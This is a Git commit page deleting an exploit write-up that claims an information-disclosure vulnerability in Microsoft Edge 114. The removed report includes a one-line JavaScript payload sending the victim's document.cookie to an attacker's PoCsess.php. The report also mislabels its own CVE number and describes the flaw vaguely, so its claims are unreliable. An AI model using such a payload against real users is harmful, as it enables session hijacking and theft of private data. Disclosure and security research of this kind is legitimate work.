MattTheTekie/Windows11Exploits
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Delete 2023/CVE-2023-33146 directory

Browse source
This commit is contained in:
nu11secur1ty 2023-07-06 12:44:38 +03:00 committed by GitHub
commit dc820a88a5
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
4 changed files with 0 additions and 57 deletions
Download patch file Download diff file Expand all files Collapse all files

2
2023/CVE-2023-33146/README.MD
View file

@ -1,2 +0,0 @@
## [CVE-2023-33146](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33145)

1
2023/CVE-2023-33146/docs/README.MD
View file

@ -1 +0,0 @@
## docs

BIN
2023/CVE-2023-33146/docs/Screenshot 2023-07-06 123726.png
View file

Binary file not shown.
Side by side

Before

Width:  |  Height:  |  Size: 732 KiB

54
2023/CVE-2023-33146/docs/report.txt
View file

@ -1,54 +0,0 @@
## Title: Microsoft Edge - 114.0.1823.67 (Official build) (64-bit)-(Chromium-based) Information Disclosure.
## Author: nu11secur1ty
## Date: 07.06.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/edge?form=MA13FJ&exp=e415
## Reference: https://portswigger.net/web-security/information-disclosure, https://www.softwaresecured.com/stride-threat-modeling/
## CVE-2023-33145
## Description:
The type of information that could be disclosed if an attacker successfully exploited this vulnerability is data inside the targeted website like IDs, tokens, nonces, cookies, IP, User-Agent, and other sensitive information.
The user would have to click on a specially crafted URL to be compromised by the attacker.
In this example, the attacker use STRIDE Threat Modeling to spoof the victim to click on his website and done.
This will be hard to detect.
## Conclusion:
Please be careful, for suspicious sites or be careful who sending you an link to open!
## Staus: HIGH Vulnerability
[+]Exploit:
- Exploit Server:
```js
## This is a Get request from the server when the victims click! And it is enough to understand this vulnerability! =)
<script> var i = new Image(); i.src="PoCsess.php?cookie="+escape(document.cookie)</script>
## WARNING: The PoCsess.php will be not uploaded for security reasons!
## BR nu11secur1ty
```
## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html)
## Time spend:
01:30:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>